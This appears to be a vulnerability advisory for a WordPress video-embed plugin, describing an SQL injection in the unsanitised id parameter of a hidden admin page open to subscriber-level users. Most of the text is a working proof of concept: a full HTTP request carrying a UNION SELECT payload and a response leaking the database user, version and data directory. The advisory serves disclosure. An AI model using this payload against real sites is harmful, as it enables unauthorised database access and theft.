The id GET parameter of one of the plugin's page (available via forced browsing) is not sanitised, validated or escaped before being used in a SQL statement, allowing low privilege users, such as subscribers, to perform SQL injection.
Note: The URL /wp-admin/admin.php?page=edit-video-embed&id=1 is not directly in the menu but can be accessed by forced browsing. GET http://172.28.128.50/wp-admin/admin.php?page=edit-video-embed&id=0+union+select+1%2Ccurrent_user%28%29%2C3%2Cdatabase%28%29%2C%40%40version%2C6%[email protected]@datadir%3B HTTP/1.1 Proxy-Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [subscriber+] Host: 172.28.128.50 Response HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 17 Apr 2021 00:25:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wp-settings-4=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-time-4=1618619143; expires=Sun, 17-Apr-2022 00:25:43 GMT; Max-Age=31536000; path=/ <...... snip ......> <form action="" method="post" name="video_embed" style="float: left; width: 100%;" id="video_embed"> <table> <tr> <td>Title: </td> <td><input type="text" name="title" value="[email protected]" /></td> </tr> <tr style="height: 50px;"> <td>Video from: </td> <td> <input type="radio" name="video_embed_for" value="youtube" /> Youtube / Vimeo <input type="radio" name="video_embed_for" value="videosuit" /> VideoSuit </td> </tr> <tr> <td>Youtube Embed Url: </td> <td> <input type="text" name="url" value="wp"/> <td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td> </td> </tr> <tr> <td>Pdf Path: </td> <td><input type="text" name="pdf" value="8.0.23-0ubuntu0.20.04.1" /></td> <td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td> </tr> <tr> <td>Audio Path: </td> <td><input type="text" name="audio" value="6" /></td> <td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td> </tr> <tr> <td>Useful Link: </td> <td><textarea name="useful_link">/var/lib/mysql/</textarea></td> <td><p style="font-size: 11px;">Please specify your html content</p></td> </tr> <tr> <td><input type="submit" value="Save"/> <td><input type="hidden" name="saved" value="1" /></td> </tr> </table> </form> </div> <div class="clear"></div></div><!-- wpbody-content --> <...... snip ......>
Syed Sheeraz Ali of Code Vigilant Project
Yes
2021-05-19 (about 2 years ago)
2021-05-19 (about 2 years ago)
2021-05-21 (about 2 years ago)